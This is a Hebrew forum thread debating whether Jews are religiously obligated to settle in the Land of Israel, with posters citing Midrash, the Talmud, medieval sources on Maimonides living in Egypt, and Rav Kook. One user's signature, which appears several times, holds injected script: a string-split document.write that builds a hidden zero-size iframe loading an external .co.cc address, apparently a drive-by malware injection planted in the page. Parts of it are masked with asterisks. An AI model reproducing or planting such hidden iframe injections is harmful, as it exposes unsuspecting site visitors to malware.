בית פורומים עצור כאן חושבים

האם יש חובה על יהודי לעלות לארץ ישראל?

שלום אורח. באפשרותך להתחבר או להירשם
הצג 15 הודעות בעמוד הוסף לדף האישי  דווח למנהל שלח לחבר
נשלח ב-12/1/2015 11:13 לינק ישיר 
האם יש חובה על יהודי לעלות לארץ ישראל?

.

בעקבות דברים שנכתבו כאן:  http://www.bhol.co.il/forums/topic.asp?cat_id=24&topic_id=3079675

נזכרתי בסיפורו של רבי זירא, בטבריא.

(שה"ש רבה, פרק ח')

אם חומה היא 
אלו ישראל העלו חומה מבבל לא חרב בית המקדש בההיא שעתא פעם שנית. 

רבי זעירא נפיק ליה לשוקא למיזבן מקומא א"ל: לדין דהוא תקיל תקיל יאות. 
ואמר ליה: לית את אזיל לן מן הכא בבלייא די חריבון אבהתיה! 
בההיא ענתה, אמר ר' זעירא: לית אבהתי כאבהתהון דהדין?! 

על לבית וועדא ושמע קליה דרבי שילא יתיב דריש 
אם חומה היא 
אילו עלו ישראל חומה מן הגולה, לא חרב בית המקדש. 
פעם שנייה אמר: יפה לימדני עם הארץ. 

דווח על תוכן פוגעני

נשלח ב-13/1/2015 17:32 לינק ישיר 

יש3 כתב:
וזה הקישור הנכון (גושניק המשיך הפסיק והוא נדבק לקישור)

קראתי את המאמר בעיון רב, אין שם חידושים הכל נאמר על ידי המחבתים למיניהם מנויגרשל עד אחרון שבהם.
מאמר מלא סתירות, טיעונים שלא מחזיקים מים, חשיבה מזוכיסטית, חשיבה של ילד מוכה שחושב שרק עם מכות הוא יהיה בסדר. ובכל הרע אשם האלוהים כמובן כי הוא הקובע את הכל מראש.

בתכלס הוא שם את מבטחו על האלוהים הדמיוני שלו זה שקובע מראש את כל הנעשה, במילא הוא לא מחפש שום רציונאליות רק תירוצים מתירוצים שונים למה אנו סובלים ולמעשה המזוכיזם שלו (ושל כל המחבתים) טוענת שזה טוב שאנו סובלים, אחרת אייך נספק את תאוות המזוכיזם שלנו ??

הייתי עובר איתכם על כל הטיעונים שלו ומוכיח לכם כמה הם לא מחזיקים מים, אבל המאמר ארוך והרבה פרטים וטיעונים וממש אין לי כוח לעשות את זה היום. אבל בלי כלום אי אפשר ולכן אני רק הגיב על דבר אחד שזה הטיעון העיקרי שלו.

הוא טוען כמו כל ילד בגן, שהאלוהים אמר והאלוהים נתן והאלוהים בחר וכו' וכו' 
אבל כידוע בדיני קניינים וממון האלוהים לא רלוונטי ולא עושים צדק על פיו ועל פי חלום של נביא, במילא כל המשענת שלו עומדת על חלומות ותו לא.

לסיכום: הוא לא יורד לעומק החשיבה של התורה והיהדות.

תוקן על ידי maxmen ב- 13/01/2015 17:34:30

דדווח על תוכן פוגעני

נשלח ב-13/1/2015 13:02 לינק ישיר 

הראי"ה קוק, אורות, ארץ ישראל, פסקא א:

ארץ־ישראל איננה דבר חיצוני, קנין חיצוני לאומה, רק בתור אמצעי למטרה של ההתאגדות הכללית והחזקת קיומה החמרי או אפילו הרוחני. ארץ־ישראל היא חטיבה עצמותית קשורה בקשר־חיים עם האומה, חבוקה בסגולות פנימיות עם מציאותיה. ומתוך כך אי־אפשר לעמוד על התוכן של סגולת קדושת ארץ־ישראל, ולהוציא לפועל את עומק חבתה, בשום השכלה רציונלית אנושית כי־אם ברוח ד׳
אשר על האומה בכללה, בהטבעת הטבעית הרוחנית אשר בנשמת ישראל, שהיא ששולחת את קויה בצבעים טבעיים בכל הארחות של ההרגשה הבריאה, ומזרחת היא את זריחתה העליונה על־פי אותה המידה של רוח הקדושה העליונה, הממלאת חיים ונעם עליון את לבב קדושי הרעיון ועמוקי המחשבה הישראלית. המחשבה על־דבר ארץ־ישראל, שהיא רק ערך חיצוני כדי העמדת אגודת האומה, אפילו
כשהיא באה כדי לבצר על־ידה את הרעיון היהדותי בגולה, כדי לשמור את צביונו ולאמץ את האמונה והיראה והחזוק של המצות המעשיות בצורה הגונה, אין לה הפרי הראוי לקיום, כי היסוד הזה הוא רעוע בערך איתן הקודש של א״י. האמוץ האמתי של רעיון היהדות בגולה בא יבא רק מצד עמק שקועו בארץ־ישדאל, ומתקות ארץ־ישראל יקבל תמיד את כל תכונותיו העצמיות. צפית־ישועה היא כח־המעמיד של היהדות הגלותית, והיהדות של ארץ־ישראל היא הישועה עצמה.

תוקן על ידי מם80 ב- 13/01/2015 13:06:44

דדווח על תוכן פוגעני

נשלח ב-13/1/2015 09:36 לינק ישיר 

וזה הקישור הנכון (גושניק המשיך הפסיק והוא נדבק לקישור)

דדווח על תוכן פוגעני

נשלח ב-13/1/2015 08:34 לינק ישיר 

מיימוני כתב:
גושניק

תודה.

אבל היכן המאמר? או שמו? והאם זה פרופסור אליצור האב או הבן?

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");

הנה המאמר http://www.daat.ac.il/daat/tanach/maamarim/elitsur-1.htm, שכחתי להוסיף. זה האב.

דדווח על תוכן פוגעני

נשלח ב-13/1/2015 08:22 לינק ישיר 

גושניק

תודה.

אבל היכן המאמר? או שמו? והאם זה פרופסור אליצור האב או הבן?

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("");

דדווח על תוכן פוגעני

נשלח ב-13/1/2015 02:10 לינק ישיר 

http://www.bhol.co.il/Article.aspx?id=78338

הגראי"ל ליהודי צרפת: אני חושש מעלייה לישראל

חברי הקהילה היהודית בצרפת פנו לגראי"ל שטיינמן להתייעצות באשר לדילמה הקורעת את הקהילה: האם לעלות ארצה או להישאר בגולה? • הגראי"ל לא תמך בעלייה מיידית ארצה, למרות החרדה ממגל הטרור: "אני חושש ממה שעלול לקרות לכם בעלייה לישראל" • בתגובה לפיגוע אמר: "כל ישראל ערבים זה לזה - פעם זה כאן ופעם זה כאן".

ירוחם

זכור לי שכתבת  שגם בעבר טענו "אני חושש ממה שעלול לקרות לכם בעלייה לישראל".

תוקן על ידי נישטאיך ב- 13/01/2015 02:24:42

דדווח על תוכן פוגעני

נשלח ב-13/1/2015 01:20 לינק ישיר 

לא כ"כ הבנתי מה רוצה פותח האשכול.
הרי אין ספק שיש עניין גדול לגור בא"י. גם לשיטת הרמב"ם וגם לרמב"ן.
השאלה האם 'עניין' הופך לחיוב, יכולה להיות גם האם 'מצוה' הופכת לחיוב. התשובה היא למעשה נחרצת, שלא!
יש תנאים שמותר לצאת, ואין חיוב לעלות (ראה ע"ז יג על התנאים, וכן בב"ב צח, ולגבי זה שאין חיוב לעלות, נדמה לי מהריט"ץ פה).
האם ראוי ונכון לעלות, בוודאי שכן!

אב, במובן זה ראוי לשאול שאלה חשובה אחרת, האם יש חיוב, ומהו טיבו של הצורך לכבוש את א"י.
לדוגמה, שטח שמעבר לקו הירוק שלא מיושב, או מיושב בגויים והם מוכרים אותו. כמה (מבחינת חומר וצורה ביחד) יש להשקיע כדי להביא את השטח ליישוב יהודי [זה כמובן בלי להכנס לפוליטיקה. להבנתי מבחינה תיאורטית כל המאמינים מסכימים לדיון בשאלה]

דדווח על תוכן פוגעני

נשלח ב-13/1/2015 01:08 לינק ישיר 

שואל בעל האשכול היקר (מאודיב היקר) האם יש חובה לעלות לארץ ומביא במקום תושבה על השאלה את האילו ואילו ?! לא היית נחרבת בית המקדש.
ואז מה ? לא גרו בחול ? ואם חרבה בית המקדש אז לא גרו עוד כאלף שנים בארץ ישראל ?  לפחות עד הרס"ג עוד היו סמכות הפסק לגולה (בעיקר לגבי הלוח) בידי חכמי ארץ ישראל.

זה ברור שאילו היינו מקיימים את התורה כפשוטו וככה כל האומות, אז בוודאי היינו בארץ ישראל. אבל בלי קיום התורה אנו בגלות אפי' בארץ ישראל אז מה ההבדל ?

לגבי השאלה אם יש חובה לעלות או לא, זה שאלת שטות. כי חובה מצד מי ? מהתורה ? התורה אומרת שבלי התורה אנו בגלות כלומר זאת לא בחירה זאת עובדה אז מה הטעם לחייב על משהו שלא בשליטה ? שלא מקיימים את התורה אנו בגלות גם בארץ ישראל אז איזה חובה ומי מחייב ?

באשכול הנ"ל (של ירוחם היקר שנסגר) ירוחם טוען שהאלוהים הבטיח לאברהם ולמשה "מדינה"
בתורתי אין כזו הבטחה. ואני חושב שהוא התבלבל לגמרי בין ישות דמיונית = מדינה, לבין הבטחת הארץ לכל פרט.
בכל אופן מצד התורה "לי" הארץ ולכן היא לא למכירה ואין קניינים באמת בארץ ישראל והיא שייכת לכל יהודי מירושה מחלוקת הארצות בגורל של נח ובניו. (אגב: זאת תשובה להרב מיימוני. כנראה הרב מיימוני שכח את עיקר הסיבה למה ארץ ישראל מול שאר הארצות) ככה שאין שאלה של חובה יש עובדה שארץ ישראל שייכת ליורשים. שזה אומר שכל פרט מהיורשים חייבים לקבל את חלקם ואת חלקם במשאבי הארץ.
כל זמן שזה לא קורה, או מצד שהגויים כבשו אותו או מצד שאחינו היהודים כבשו אותו והקימו ישות דמיונית שנקראת מדינה. אין לזה שום ערך ליהודי מול שאר הארצות שהכל פונקציה של קניין על ידי כסף.

הבסיס הוא דיי פשוט. התורה והיהדות (יותר נכון המציאות של הקיום) לא מכירה בקניין מכוח הכיבוש (אפי' מה שמשה רבינו כבש עם שבט ראובן וגד, אז בני ראובן וגד לא מביאים ביכורים בגלל שזה לא ירושתינו רק כיבוש) ולא בכוח הכסף (= לי הארץ = חוזר ליורשים תמיד), אך ורק עם חלוקה בגורל כמו שנח עשה.

עקרונית, אם כל בני אנוש (ממש כולם) יסכימו לחלוקה בגורל מחדש + חוקי הירושה, אז יכול להיות שנזכה בארצי שווייץ והרב מיימוני יהיה השכן שלי (איזה כיף). כלומר מצד התורה אין שום ערך לארץ ישראל בכלל, זה פשוט ירושתינו מהחלוקה של נח,(חז"ל מסבירים שקרה נס שהפרטים מצאו חן בנחלתם שנפל להם בגורל, כלומר זה לא פשוט לעשות גורל אם מישהו לא מוצא חן בעיניו מה שנפל לו בגורל. כלומר בוודאי שאין ערך מצד הארץ יש ערך מצד התובנה האנושית בחלוקת הארצות לעמים ולפרטים כפי שהצו הקטגורי של קאנט דורשת ולכן כל אחד מצא את היופי בנחלתו מכוח הבנתו שרק ככה יש לו קניין באמת. התובנה הזאת הביא את הנס שחז"ל מדברים עליו) ככה שאם נעשה חלוקה מחדש אז נלך לשם וזאת תהיה ארץ ירושתינו.

ולכן יש חובה אחת ויחידה על פי היהדות, והיא או שנחלק את הארצות שוב בגורל או שאנו חוזרים לארץ ירושתינו מהחלוקה ההיא. כל זמן שזה לא קורה אז אין הבדל, רק להפך יש חובה דאורייתא לברוח מארץ ישראל ומפריז וכדומה כי הוא מקום סכנה וככה בדיוק נהגו אבותינו זה אלפי שנים.
כי אם הכסף מקנה לך את הטבע ?! אז למה להסתכן לריק ?? זאת השאלה והתשובה היא שחובה לברוח.

תוקן על ידי maxmen ב- 13/01/2015 01:26:08

דדווח על תוכן פוגעני

נשלח ב-13/1/2015 00:14 לינק ישיר 

מיימוני כתב:
מואדיב

אני מודה ומתבייש שלא הבנתי את הארמית. אפשר תירגום?

(אפשר להבין שרבי זירא למד מעם הארץ שראוי היה שגם אבותיו היו עולים ולא רק הוא, אבל זה ניחוש לפי הסוף).

ושם האחר

דומני שהודעתך האחרונה השתבשה ואולי בגלל תקלה בכתיבה מאייפון ודומיו? סמיילי.

בכל אופן, אם שאלת על הרמב"ם, איך הוא גר במצרים אם אסור לגור במצרים ומדוע לא התגורר בארץ - שתי תשובות שהן אחת בדבר.

בארץ היה קשה עד בלתי אפשרי לגור מטעמי פרנסה או טעמים אחרים. מואדיב (ואולי אחרים) יכולים לציין על מיגבלות המגורים ליהודים בירושלים ואולי בעוד מקומות במשך מאות שנים.

אשר למצרים, הרמב"ם עצמו (ואיני זוכר היכן) מציין שהוא גר במצרים על כורחו והוא מבטל מצות לא תעשה לאונסו.

שאלה מעניינת היא מה החשיבות של ארץ ישראל.

1. תמיד הבנתי שהתורה משבחת את ארץ ישראל על היותה משובחת משאר ארצות. בימי הבינים אכן טענו שארץ ישראל שוכנת, לפי מה שכינו "תורת האקלימים", במקום הטוב ביותר בארץ (איני יודע אם ידעו שהארץ כדורית כבר אז).

אבל האם זה באמת נכון? האם, למשל, איטליה, או תורכיה, או שוויץ, או אוקראינה, אינן ארצות עם תנאים טובים יותר? לחקלאות, למגורים?

אולי התשובה היא שהעדיפות של ארץ ישראל אינה דווקא בתור הארץ המשובחת בעולם - מה שאמור להימדד באופן אובייקטיבי.

2. יש מדרש שאף הובא פעם בפורום אודות אברהם שהגיע לארץ וראה שעובדים קשה ואמר: זה המקום בו ארצה לגור.

כלומר הסיבה היא תרבותית.

יש כאן חינוך לעבודה.

3. הסבר דומה הוא שבגלל שהארץ תלויה בהשגחה פרטית לגשם, המתגוררים כאן תמיד חשים שהם תלויים באלוקים ובהשגחתו.

בדומה למדרש שאומר בשם רשב"י כי המן ירד בכל יום כדי שילמדו להעריך את המתן היומי ואת היותם תלויים בהשם.

4. כמדומה שלפי הרמב"ם (פרופסור לוינגר וכמסתבר אחרים) המעלה של ארץ ישראל אינה אלא או בעיקר בהיותה בעלת ערך היסטורי ולכן חינוכי.

אילו משה רבנו, כמו בבדיחה שסיפרו הילדים בילדותי, היה מביא אותנו לשוויץ, או אילו אברהם אבינו היה נודד עד שם, זו היתה ארץ ישראל שלנו.

5. ההסבר הקבלי הוא כמובן שארץ ישראל מכוונת נגד שער השמים ולכן מכאן יורד השפע לעולם. כל מה שמגיע לארצות אחרות עובר תחילה דרך ארץ ישראל. (כמדומה שיש מדרשים שהם באמת של חז"ל שאפשר להשתמש בהם כדי להצדיק או לתלות בהם את הפרשנות הזו).

יש כאן אם כאן שלושה או ארבעה הסברים שונים למעלת ארץ ישראל: גיאוגרפית-פיזיקלית אובייקטיבית, היסטורית וחינוכית, מגית לפי הנעוץ בחלק הנסתר של הבריאה.

מעתה יש לשאול: האם באמת אם כן חשוב להיות דווקא בארץ? אם יש מרכז יהודי שמסתדר בלעדי, האם זה משנה אם אני למשל אבחר לעבור לחו"ל או להישאר בחו"ל? האם להיות יהודי מחייב דווקא להיות בארץ ישראל?

אני כותב זאת בתמיהה מפני שאני, כידוע, ציוני. והנה אני מוצא שהבסיס של האמונה התמימה שלי נשמט בהתחשב בניתוח זה.

מי ישיב לי את אבדתי?

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");

ר׳ מיימוני, הא לך מאמר של פרופסור אליצור (שכמדומני לא היה מאגיקן) על מעמד ארץ ישראל במקרא. בחלק ב הוא מפרט את הגישות השונות ללמה נבחרה א״י (את רובן הזכרת) ומסביר את גישתו לפי פשוטו של מקרא. מומלץ לקרוא בעניין זה את אורות - ארץ ישראל בייחוד את פסקה א, שיש האומרים שנכתבה כנגד גישת הרש״ר הירש. דרך אגב, עד כמה שידוע לי במצרים ידעו כבר לפני 3000 שנה עד כדוריות העולם.

דדווח על תוכן פוגעני

נשלח ב-12/1/2015 19:18 לינק ישיר 

עקביה
לא כתוב שזה קרה באיגרת אחת אלא באופן קבוע.

דדווח על תוכן פוגעני

נשלח ב-12/1/2015 19:16 לינק ישיר 

רעיון דומה לזה שנמצא במדרש שה"ש נמצא ביומא ט:

תלמוד בבלי מסכת יומא דף ט עמוד ב 

ריש לקיש הוי סחי בירדנא, אתא רבה בר בר חנה יהב ליה ידא. אמר ליה: אלהא סנינא לכו, דכתיב אם חומה היא נבנה עליה טירת כסף ואם דלת היא נצור עליה לוח ארז, אם עשיתם עצמכם כחומה ועליתם כולכם בימי עזרא - נמשלתם ככסף, שאין רקב שולט בו, עכשיו שעליתם כדלתות נמשלתם כארז שהרקב שולט בו. 

רש"י שם מפרש על השראת השכינה, שלא הייתה בבית שני כמו בבית ראשון, והשפת אמת מוסיף את הקשר לחורבן, ומציין לאותו מדרש שה"ש.

יש

הבאתי את הכו"פ כמקור למה שהזכיר מיימוני. אם זה כך או לא כך אינני יודע. עכ"פ גם אתה אינך יודע לאיזו אגרת שלוחה נתכוון אותו צאצא, כך שאין כל ראיה שזה לא כך. 

תוקן על ידי עקביה ב- 12/01/2015 19:16:21

דדווח על תוכן פוגעני

נשלח ב-12/1/2015 18:22 לינק ישיר 

עקביה
הבעיה בכפו"פ היא שאנו מכירים את אגרות הרמב"ם וזה לא כך.

דדווח על תוכן פוגעני

נשלח ב-12/1/2015 18:21 לינק ישיר 

מיימוני
לכאו' יש מצווה לגור בא"י, ודי בכך. אם אתה מחפש משמעות לא"י מעבר למצווה כנראה שתצטרך ללכת לכיוון תרבותי-לאומי-היסטורי שהוא סובייקטיבי. אם אתה רוצה משהו אובייקטיבי כנראה שתצטרף ללכת לכיוון מיסטי (מאגי לא נ"ל קשור למה שתארת אם כי הוא נמצא בתפיסת הרמב"ן).
[לגבי כדוריות הארץ, היא ידועה במופת כבר מימי היוונים, והיתה ידועה ביה"ב גם למי שהיה בקי בפילוסופיה. לא היתה ידועה למי שלא, והיתה מפוקפקת בעיני מי שהכיר רק מבחוץ כמו הרמב"ן שמסתפק אם המופתים בעניין הם אמיתיים או מפתים].

דדווח על תוכן פוגעני

נשלח ב-12/1/2015 17:58 לינק ישיר 

ספר כפתור ופרח פרק ה 

וכן הדר בארץ מצרים שעובר שלשה לאוין. ושמעתי במצרים מפי ה"ר שמואל ז"ל אחד מבני בניו של הר"ם במז"ל, שכשהר"ם ז"ל היה חותם שמו באגרת שלוחה היה מסיים, הכותב העובר בכל יום שלשה לאוים פלוני. אמרתי לו דרך חצי נחמה, שמא הרב ז"ל היה מוכרח לעמוד שם שהרי היה רופא למלך מצרים, 

דדווח על תוכן פוגעני

נשלח ב-12/1/2015 17:38 לינק ישיר 

מואדיב

אני מודה ומתבייש שלא הבנתי את הארמית. אפשר תירגום?

(אפשר להבין שרבי זירא למד מעם הארץ שראוי היה שגם אבותיו היו עולים ולא רק הוא, אבל זה ניחוש לפי הסוף).

ושם האחר

דומני שהודעתך האחרונה השתבשה ואולי בגלל תקלה בכתיבה מאייפון ודומיו? סמיילי.

בכל אופן, אם שאלת על הרמב"ם, איך הוא גר במצרים אם אסור לגור במצרים ומדוע לא התגורר בארץ - שתי תשובות שהן אחת בדבר.

בארץ היה קשה עד בלתי אפשרי לגור מטעמי פרנסה או טעמים אחרים. מואדיב (ואולי אחרים) יכולים לציין על מיגבלות המגורים ליהודים בירושלים ואולי בעוד מקומות במשך מאות שנים.

אשר למצרים, הרמב"ם עצמו (ואיני זוכר היכן) מציין שהוא גר במצרים על כורחו והוא מבטל מצות לא תעשה לאונסו.

שאלה מעניינת היא מה החשיבות של ארץ ישראל.

1. תמיד הבנתי שהתורה משבחת את ארץ ישראל על היותה משובחת משאר ארצות. בימי הבינים אכן טענו שארץ ישראל שוכנת, לפי מה שכינו "תורת האקלימים", במקום הטוב ביותר בארץ (איני יודע אם ידעו שהארץ כדורית כבר אז).

אבל האם זה באמת נכון? האם, למשל, איטליה, או תורכיה, או שוויץ, או אוקראינה, אינן ארצות עם תנאים טובים יותר? לחקלאות, למגורים?

אולי התשובה היא שהעדיפות של ארץ ישראל אינה דווקא בתור הארץ המשובחת בעולם - מה שאמור להימדד באופן אובייקטיבי.

2. יש מדרש שאף הובא פעם בפורום אודות אברהם שהגיע לארץ וראה שעובדים קשה ואמר: זה המקום בו ארצה לגור.

כלומר הסיבה היא תרבותית.

יש כאן חינוך לעבודה.

3. הסבר דומה הוא שבגלל שהארץ תלויה בהשגחה פרטית לגשם, המתגוררים כאן תמיד חשים שהם תלויים באלוקים ובהשגחתו.

בדומה למדרש שאומר בשם רשב"י כי המן ירד בכל יום כדי שילמדו להעריך את המתן היומי ואת היותם תלויים בהשם.

4. כמדומה שלפי הרמב"ם (פרופסור לוינגר וכמסתבר אחרים) המעלה של ארץ ישראל אינה אלא או בעיקר בהיותה בעלת ערך היסטורי ולכן חינוכי.

אילו משה רבנו, כמו בבדיחה שסיפרו הילדים בילדותי, היה מביא אותנו לשוויץ, או אילו אברהם אבינו היה נודד עד שם, זו היתה ארץ ישראל שלנו.

5. ההסבר הקבלי הוא כמובן שארץ ישראל מכוונת נגד שער השמים ולכן מכאן יורד השפע לעולם. כל מה שמגיע לארצות אחרות עובר תחילה דרך ארץ ישראל. (כמדומה שיש מדרשים שהם באמת של חז"ל שאפשר להשתמש בהם כדי להצדיק או לתלות בהם את הפרשנות הזו).

יש כאן אם כאן שלושה או ארבעה הסברים שונים למעלת ארץ ישראל: גיאוגרפית-פיזיקלית אובייקטיבית, היסטורית וחינוכית, מגית לפי הנעוץ בחלק הנסתר של הבריאה.

מעתה יש לשאול: האם באמת אם כן חשוב להיות דווקא בארץ? אם יש מרכז יהודי שמסתדר בלעדי, האם זה משנה אם אני למשל אבחר לעבור לחו"ל או להישאר בחו"ל? האם להיות יהודי מחייב דווקא להיות בארץ ישראל?

אני כותב זאת בתמיהה מפני שאני, כידוע, ציוני. והנה אני מוצא שהבסיס של האמונה התמימה שלי נשמט בהתחשב בניתוח זה.

מי ישיב לי את אבדתי?

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("");

דדווח על תוכן פוגעני

בית > פורומים > דת ואמונה > עצור כאן חושבים > האם יש חובה על יהודי לעלות לארץ ישראל?
מנהל לחץ כאן לנעילת האשכול
הוסף לעמוד האישי  דווח למנהל שלח לחבר
1 2 לדף הבא סך הכל 2 דפים.

bholext